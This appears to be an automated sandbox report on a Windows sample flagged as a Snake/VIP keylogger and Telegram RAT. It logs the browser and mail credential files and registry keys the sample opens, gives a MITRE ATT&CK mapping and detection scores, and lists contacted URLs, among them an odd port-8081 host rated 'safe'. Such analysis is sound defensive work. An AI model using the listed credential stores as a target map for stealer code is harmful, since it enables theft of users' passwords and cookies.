Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match

File source: 00000004.00000002.4171196895.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 4.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3da9138.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3f42e50.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3f42e50.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3da9138.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.4169573077.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1738966608.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe PID: 7252, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe PID: 7472, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 4.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3da9138.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3f42e50.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3f42e50.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3da9138.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.4169573077.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1738966608.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe PID: 7252, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe PID: 7472, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: Yara match	File source: 4.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3da9138.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3f42e50.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3f42e50.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3da9138.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.4169573077.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4171196895.0000000002CC8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1738966608.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe PID: 7252, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe PID: 7472, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match

File source: 00000004.00000002.4171196895.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 4.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3da9138.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3f42e50.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3f42e50.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3da9138.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.4169573077.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1738966608.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe PID: 7252, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe PID: 7472, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 4.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3da9138.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3f42e50.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3f42e50.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3da9138.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.4169573077.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1738966608.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe PID: 7252, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe PID: 7472, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	1 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	111 Process Injection	1 Deobfuscate/Decode Files or Information	1 Input Capture	13 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	3 Obfuscated Files or Information	Security Account Manager	1 Security Software Discovery	SMB/Windows Admin Shares	1 Screen Capture	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Software Packing	NTDS	1 Process Discovery	Distributed Component Object Model	1 Email Collection	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	31 Virtualization/Sandbox Evasion	SSH	1 Input Capture	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	31 Virtualization/Sandbox Evasion	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	111 Process Injection	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	29%	ReversingLabs	Win32.Trojan.CrypterX
SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	100%	Avira	HEUR/AGEN.1308792
SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://www.fontbureau.com/designersG	0%	URL Reputation	safe
http://www.fontbureau.com/designers/?	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.fontbureau.com/designers?	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.fontbureau.com/designers	0%	URL Reputation	safe
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://varders.kozow.com:8081	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://checkip.dyndns.org/	0%	URL Reputation	safe
http://checkip.dyndns.org/q	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.fonts.com	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/	0%	URL Reputation	safe
